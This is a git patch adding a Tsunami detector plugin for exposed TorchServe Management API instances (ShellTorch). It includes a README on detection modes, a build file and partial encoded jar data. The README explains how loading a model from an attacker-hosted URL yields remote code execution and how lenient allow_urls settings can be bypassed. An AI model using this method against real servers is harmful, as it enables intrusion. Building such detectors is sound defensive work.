From 0376fac3853ceb102ff2d5c65776201542135ec0 Mon Sep 17 00:00:00 2001 From: Savino Sisco Date: Tue, 19 Dec 2023 12:07:45 +0100 Subject: [PATCH] TorchServe Management API RCE --- doyensec/detectors/rce/torchserve/README.md | 48 + .../detectors/rce/torchserve/build.gradle | 99 ++ .../gradle/wrapper/gradle-wrapper.jar | Bin 0 -> 43462 bytes .../gradle/wrapper/gradle-wrapper.properties | 7 + doyensec/detectors/rce/torchserve/gradlew | 249 +++++ doyensec/detectors/rce/torchserve/gradlew.bat | 92 ++ .../detectors/rce/torchserve/settings.gradle | 1 + .../rce/torchserve/TorchServeExploiter.java | 900 ++++++++++++++++++ ...hServeManagementAPIExploiterWebServer.java | 86 ++ .../TorchServeManagementApiArgs.java | 62 ++ .../TorchServeManagementApiConfig.java | 34 + .../TorchServeManagementApiDetector.java | 174 ++++ ...eManagementApiDetectorBootstrapModule.java | 27 + .../rce/torchserve/TorchServeRandomUtils.java | 47 + .../resources/model/MAR-INF/MANIFEST.json | 12 + .../src/main/resources/model/model.py | 79 ++ .../src/main/resources/model/serialized.pt | 0 .../torchserve/MockTorchServeExploiter.java | 47 + ...hServeManagementApiExploiterWebServer.java | 52 + .../torchserve/MockTorchServeRandomUtils.java | 22 + .../torchserve/TorchServeExploiterTest.java | 195 ++++ .../TorchServeExploiterTestWithCallback.java | 108 +++ .../TorchServeManagementApiDetectorTest.java | 416 ++++++++ .../TorchServeManagementApiTestBase.java | 101 ++ ...nagementApiTestBaseWithCallbackServer.java | 72 ++ 25 files changed, 2930 insertions(+) create mode 100644 doyensec/detectors/rce/torchserve/README.md create mode 100644 doyensec/detectors/rce/torchserve/build.gradle create mode 100644 doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar create mode 100644 doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.properties create mode 100755 doyensec/detectors/rce/torchserve/gradlew create mode 100644 doyensec/detectors/rce/torchserve/gradlew.bat create mode 100644 doyensec/detectors/rce/torchserve/settings.gradle create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiter.java create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementAPIExploiterWebServer.java create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiArgs.java create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiConfig.java create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetector.java create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorBootstrapModule.java create mode 100644 doyensec/detectors/rce/torchserve/src/main/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeRandomUtils.java create mode 100644 doyensec/detectors/rce/torchserve/src/main/resources/model/MAR-INF/MANIFEST.json create mode 100644 doyensec/detectors/rce/torchserve/src/main/resources/model/model.py create mode 100644 doyensec/detectors/rce/torchserve/src/main/resources/model/serialized.pt create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeExploiter.java create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeManagementApiExploiterWebServer.java create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/MockTorchServeRandomUtils.java create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTest.java create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeExploiterTestWithCallback.java create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiDetectorTest.java create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBase.java create mode 100644 doyensec/detectors/rce/torchserve/src/test/java/com/google/tsunami/plugins/detectors/rce/torchserve/TorchServeManagementApiTestBaseWithCallbackServer.java diff --git a/doyensec/detectors/rce/torchserve/README.md b/doyensec/detectors/rce/torchserve/README.md new file mode 100644 index 000000000..c048606f3 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/README.md @@ -0,0 +1,48 @@ +# TorchServe Management API Detection Plugin +## Overview +This plugin detects and assesses the security risks of TorchServe Management API instances. Inspired by the ShellTorch vulnerability chain (disclosed by [Oligo Security](https://www.oligo.security/blog/shelltorch-torchserve-ssrf-vulnerability-cve-2023-43654)), it addresses the critical risks associated with insecure configurations of TorchServe, a widely used open-source application for serving PyTorch models in production. + +## Background +TorchServe, before version 0.8.2, bound to `0.0.0.0` by default, potentially exposing its Management API to the internet. Since PyTorch models allow arbitrary code execution, unrestricted model addition poses significant risks including data leakage and user privacy breaches. + +The original ShellTorch attack exploited [CVE-2022-1471](https://nvd.nist.gov/vuln/detail/CVE-2022-1471), a vulnerability fixed in TorchServe 0.8.2. However, the risk of executing arbitrary code in models remains in the latest version (0.9.0). + +To mitigate these risks, TorchServe introduced the allow_urls feature, limiting model downloads to specified sources. However, a typical `allow_urls` configuration often includes entire services like GCP and AWS, which can be insecure. It's important to configure `allow_urls` carefully to avoid such vulnerabilities. + +## Plugin Description +This plugin detects exposed TorchServe Management API instances, assessing the remote code execution (RCE) risk. It supports multiple detection modes: + +### Static Mode +**Description:** Manually host a model file on a web server. Most reliable, particularly effective against lenient `allow_urls` configurations. +**Use case:** Ideal when `allow_urls` includes cloud services, posing a security risk. + +``` +--torchserve-management-api-mode=static --torchserve-management-api-model-static-url=https://s3.amazonaws.com/model.mar +``` + +### Local Mode +**Description:** Serve the model via an embedded web server. Quicker setup, but may fail against restrictive `allow_urls`. +**Use case:** Best for environments where `allow_urls` is not a limiting factor. + +``` +--torchserve-management-api-mode=local --torchserve-management-api-local-bind-host=tsunami --torchserve-management-api-local-bind-port=1234 --torchserve-management-api-local-accessible-url=http://mydomain.com/ +``` + +### SSRF Mode +**Description:** Uses Tsunami's callback server as the model source. Indirect verification of RCE risk. +**Use case:** Selected when direct model serving isn't feasible or as an additional verification layer. + +``` +--torchserve-management-api-mode=ssrf +``` + +### Basic Mode +**Description:** Default mode that relies solely on Management API fingerprinting. +**Use case:** Automatically selected when callback server isn't available, useful as a preliminary check. + +``` +--torchserve-management-api-mode=basic +``` + +## Testing +Utilize the following testbed for assessing plugin functionality: [TorchServe Security Testbed](https://github.com/google/security-testbeds/tree/main/torchserve). diff --git a/doyensec/detectors/rce/torchserve/build.gradle b/doyensec/detectors/rce/torchserve/build.gradle new file mode 100644 index 000000000..c9704ecf2 --- /dev/null +++ b/doyensec/detectors/rce/torchserve/build.gradle @@ -0,0 +1,99 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami VulnDetector plugin for TorchServe CVE-2023-43654.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + javaxInjectVersion = '1' + jcommanderVersion = '1.48' + okhttpVersion = '3.12.0' + + + guavaVersion = '28.2-jre' + guiceVersion = '4.2.3' + tsunamiVersion = '0.0.14' + junitVersion = '4.13' + okhttpVersion = '3.12.0' + truthVersion = '1.0.1' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + implementation "javax.inject:javax.inject:${javaxInjectVersion}" + implementation "com.beust:jcommander:${jcommanderVersion}" + implementation "com.squareup.okhttp3:okhttp:${okhttpVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.guava:guava-testlib:${guavaVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" + testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}" +} + +// Generate model.zip file and include it in the jar file. +task createModelsZip(type: Zip) { + from 'src/main/resources/model' + into '/' + destinationDirectory = file("$buildDir/resources/main") + archiveFileName = 'model.mar' +} + +processResources.dependsOn createModelsZip diff --git a/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar b/doyensec/detectors/rce/torchserve/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 0000000000000000000000000000000000000000..d64cd4917707c1f8861d8cb53dd15194d4248596 GIT binary patch literal 43462 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 